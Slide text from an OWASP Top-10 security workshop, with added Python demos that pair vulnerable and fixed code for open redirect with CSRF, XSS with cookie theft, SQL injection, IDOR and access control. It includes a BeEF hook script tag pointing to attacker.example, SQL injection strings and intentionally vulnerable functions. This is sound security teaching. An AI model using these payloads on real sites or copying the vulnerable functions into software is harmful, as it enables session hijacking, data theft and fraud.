OWASP Top-10 Hands-on Workshop
whoami
• Security Engineer @ SoftServe
• NU "LP" student
What do we do?
• Web Application Security Assessment
• Penetration Testing
• Secure Software Development Lifecycle
Open Web Application Security Project
• Non-profit organization
• Numerous chapters around the globe
• Everyone can join
• Open source
Meetings and conferences all around the globe
@AppSecEU ‘15 in Amsterdam
Knowledge base
OWASP Top-10
1. Injection
2. Broken Authentication and Session Management
3. Cross-Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross-Site Request Forgery (CSRF)
9. Using Components with Known Vulnerabilities
10. Unvalidated Redirects and Forwards
OWASP is GOOD!
Hackers
• Methodologies for how to hack
Developers
• Methodologies for how to implement things securely and how to fix them
Testers
• The same material the hackers use
• Methodologies for testing the security of their own projects
Demo Time
Rules
• Either follow the scenario with me or try to find the 10 vulnerabilities by yourself.
• No scanners (DDoS alert).
• Do not attack the infrastructure. Only web application vulnerabilities here.
• Do not attack the people around you.
• No punching.
Let's begin
• <open redirect url>
• <change pass csrf url>
• <Email for SE>
• Credentials:
Open Redirect + CSRF
Open Redirect: the application redirects to whatever URL the request supplies, without validating it
example.com/smth?redirect_url=http://google.com
CSRF: a state-changing request that the browser sends together with the victim's session cookies, so any page the victim visits can trigger it
bank.com/trans?acc1=1234&acc2=4321&amount=10000
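The chain the slide sketches, as an added worked example (not the workshop application's code): the open redirect on example.com is used to bounce the victim to the bank's GET transfer endpoint, a fixed redirect handler refuses anything that is not same-site, and the bank side shows the token check that makes a forged request fail. The endpoint paths, the allow-listed hosts and the token size are assumptions.

```python
"""Open redirect chained into CSRF, plus the two fixes.

Constructed demo for this writeup, not the hole-blog code. Assumed:
GET /smth?redirect_url=<anything> on example.com (the open redirect) and
GET /trans?acc1=&acc2=&amount= on bank.com (the state-changing request).
"""
import hmac
import secrets
from typing import Optional
from urllib.parse import parse_qs, quote, urlsplit

ALLOWED_HOSTS = {"example.com", "www.example.com"}  # assumed allow-list


def vulnerable_redirect(request_url: str) -> Optional[str]:
    """Returns the Location header exactly as supplied in the query string."""
    qs = parse_qs(urlsplit(request_url).query)
    return qs.get("redirect_url", [None])[0]  # no validation at all


def is_safe_redirect(target: Optional[str]) -> bool:
    """Accept only a same-site target: a single-slash relative path, or an
    http(s) URL whose host is on the allow-list."""
    if not target:
        return False
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # relative path; reject protocol-relative ("//evil") and "/\evil" tricks
        return target.startswith("/") and not target.startswith(("//", "/\\"))
    if parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, etc.
    # hostname strips userinfo, so "http://example.com@evil.com" is evil.com
    return parts.hostname in ALLOWED_HOSTS


def safe_redirect(request_url: str, fallback: str = "/") -> str:
    """The fixed handler: validate, fall back to the site root otherwise."""
    target = vulnerable_redirect(request_url)
    return target if is_safe_redirect(target) else fallback


def attacker_link(bank_transfer_url: str) -> str:
    """The phishing link: looks like example.com, lands on the bank.
    The inner URL is percent-encoded so its '&' does not split our query."""
    return "http://example.com/smth?redirect_url=" + quote(bank_transfer_url, safe="")


# Bank side: bind state-changing requests to a secret the attacker cannot
# read (kept in the session, echoed in the form, compared in constant time).
def issue_csrf_token() -> str:
    return secrets.token_urlsafe(32)


def csrf_token_valid(session_token: str, submitted: Optional[str]) -> bool:
    return submitted is not None and hmac.compare_digest(session_token, submitted)
```

The victim's browser follows the 302 from example.com to bank.com and attaches the bank's cookies, which is why the transfer succeeds; `is_safe_redirect` kills the first link of the chain and a token check on the bank (together with refusing GET for state changes) kills the second.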
XSS + Broken Authentication
Cross-Site Scripting: supply JS code instead of valid data; the browser processes the response and executes it
Broken Auth: session management flaws (in our case the session cookie is set without the HttpOnly flag, so injected script can read it through document.cookie)
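Why the two issues combine, as an added example that is not part of the slides or the hole-blog code: a comment is reflected unescaped (the XSS), the session cookie is issued without HttpOnly (the broken session management), and a tester's check over the Set-Cookie headers shows exactly which cookies an injected script could steal. The comment markup, cookie names and hook URL are assumptions.

```python
"""Reflected XSS next to the output-encoding fix, and a session cookie
with and without HttpOnly. Constructed demo, not the workshop app."""
import html
from typing import List, Set, Tuple

HOOK = '<script src="http://attacker.example/hook.js"></script>'  # assumed hook URL


def render_comment_vulnerable(text: str) -> str:
    """Puts user input into the page as-is: the browser runs any script in it."""
    return '<p class="comment">%s</p>' % text


def render_comment(text: str) -> str:
    """Output encoding for an HTML body context: tags become text."""
    return '<p class="comment">%s</p>' % html.escape(text, quote=True)


def session_cookie(value: str, hardened: bool) -> str:
    """Set-Cookie header value for the session id, as the demo app sends it
    (hardened=False) and as it should be sent (hardened=True)."""
    if not hardened:
        return "session=%s; Path=/" % value
    return "session=%s; Path=/; HttpOnly; Secure; SameSite=Lax" % value


def cookie_attributes(set_cookie: str) -> Tuple[str, Set[str]]:
    """Cookie name and its attribute names (lower-cased) from a Set-Cookie value."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs


def cookies_readable_by_script(set_cookie_headers: List[str]) -> List[str]:
    """Names of cookies that document.cookie would expose: the check to run
    on a response when looking for the missing HttpOnly flag."""
    exposed = []
    for header in set_cookie_headers:
        name, attrs = cookie_attributes(header)
        if "httponly" not in attrs:
            exposed.append(name)
    return exposed


def stolen_by_hook(set_cookie_headers: List[str], page: str) -> List[str]:
    """What a BeEF-style hook would get: nothing unless the script tag
    survives rendering, and then only the cookies lacking HttpOnly."""
    if "<script" not in page:
        return []
    return cookies_readable_by_script(set_cookie_headers)
```

Either fix on its own breaks the session-theft chain: encoding the output stops the hook from loading, and HttpOnly keeps the session id out of reach even when a script does run (the hooked browser can still be driven, but the session cannot be replayed elsewhere).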
BeEF
Inject this script into the website:
<script src="<url to the hook>" type="text/javascript"></script>
SQLi + Security Misconfiguration + Sensitive Data Exposure
SQL injection: supply SQL operators and statements instead of valid data; the server concatenates them into the query and executes them as SQL (not as strings)
Security misconfiguration: crypto misuse, wrong DB configuration, etc.
Sensitive Data Exposure: leakage of critical information
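An added worked example for this slide (not the hole-blog code) on an in-memory SQLite database: the string-built login query is bypassed and then used to dump the whole user table, which hurts twice because the passwords are stored in plaintext; beside it, the parameterised query with salted PBKDF2 hashes. Table names, users and passwords are constructed.

```python
"""SQL injection and plaintext password storage next to the fixed version.
Constructed demo on SQLite, not the workshop application's code."""
import hashlib
import hmac
import os
import sqlite3
from typing import List, Optional, Tuple

PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def setup_db() -> sqlite3.Connection:
    """Two tables with the same constructed users: one as the vulnerable app
    stores them (plaintext), one as the fixed app does (salted hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_plain (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE users_hashed (id INTEGER PRIMARY KEY, username TEXT, salt BLOB, pw_hash BLOB)")
    for username, password in [("admin", "Sup3rS3cret"), ("bob", "hunter2")]:  # constructed
        conn.execute("INSERT INTO users_plain (username, password) VALUES (?, ?)",
                     (username, password))
        salt = os.urandom(16)
        conn.execute("INSERT INTO users_hashed (username, salt, pw_hash) VALUES (?, ?, ?)",
                     (username, salt, hash_password(password, salt)))
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """String-built query: whatever the user types is parsed as SQL.
    "admin' --" comments out the password check; a UNION in the username
    field turns the login form into a data dump."""
    query = ("SELECT id, username FROM users_plain "
             "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(query).fetchall()


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[int, str]]:
    """Parameterised query (input stays a string) and a constant-time
    comparison of salted hashes, so a dump would not yield passwords."""
    row = conn.execute(
        "SELECT id, username, salt, pw_hash FROM users_hashed WHERE username = ?",
        (username,)).fetchone()
    if row is None:
        return None
    uid, name, salt, pw_hash = row
    if hmac.compare_digest(pw_hash, hash_password(password, salt)):
        return uid, name
    return None
```

The misconfiguration half of the slide is not something SQLite can show; in a real deployment the same dump query is limited by running the application as a database user that can only reach its own tables.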
Everything else ...
Insecure Direct Object Reference: access a file (or any other object) you have no permission to, simply by changing its identifier in the request
Missing Function Level Access Control: access to a restricted (sensitive) function that is only hidden from the UI, not enforced on the server
Using Components with Known Vulnerabilities: vulnerable OS, libraries, frameworks, CMS, algorithms, etc.
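The first two items side by side with their fix, as an added example that is not the hole-blog code: a draft lookup that trusts the id in the request (IDOR) next to one that checks ownership, and an admin-only delete that is merely unlinked from the UI next to one guarded on the server. Users, roles and posts are constructed.

```python
"""IDOR and missing function-level access control, vulnerable and fixed.
Constructed demo for this writeup, not the workshop application's code."""
from dataclasses import dataclass
from functools import wraps
from typing import Callable, Dict, Tuple


class Forbidden(Exception):
    """Raised where the fixed handlers would return HTTP 403."""


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin" (assumed roles)


# constructed data: post id -> (owner id, draft body)
POSTS: Dict[int, Tuple[int, str]] = {
    1: (100, "alice's draft"),
    2: (200, "bob's draft"),
}


def get_draft_vulnerable(current: User, post_id: int) -> str:
    """IDOR: any logged-in user reads any draft by guessing the id."""
    return POSTS[post_id][1]


def get_draft(current: User, post_id: int) -> str:
    """Fixed: the object is only returned if the caller owns it (or is admin)."""
    owner, body = POSTS[post_id]
    if owner != current.id and current.role != "admin":
        raise Forbidden("user %d does not own post %d" % (current.id, post_id))
    return body


def require_role(role: str) -> Callable:
    """Server-side check on every call; hiding the link is not access control."""
    def decorator(fn: Callable) -> Callable:
        @wraps(fn)
        def wrapper(current: User, *args, **kwargs):
            if current.role != role:
                raise Forbidden("%s requires role %r" % (fn.__name__, role))
            return fn(current, *args, **kwargs)
        return wrapper
    return decorator


def delete_post_vulnerable(current: User, post_id: int) -> bool:
    """Missing function-level control: the admin menu does not show this
    URL to normal users, but anyone who requests it gets it executed."""
    return POSTS.pop(post_id, None) is not None


@require_role("admin")
def delete_post(current: User, post_id: int) -> bool:
    """Fixed: the role is checked where the action happens."""
    return POSTS.pop(post_id, None) is not None
```

The ownership check has to live next to the data access, not in the code that builds links; the same applies to the role check, which is why it is a decorator on the handler rather than a condition in the template.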
What to do next?
• Try it by yourself: https://github.com/Varyagovich/hole-blog
• Try to fix the project
• Use OWASP projects (attack/prevention cheat sheets and tools)
• Contribute!
http://owasp-lviv.blogspot.com/
STAY SAFE!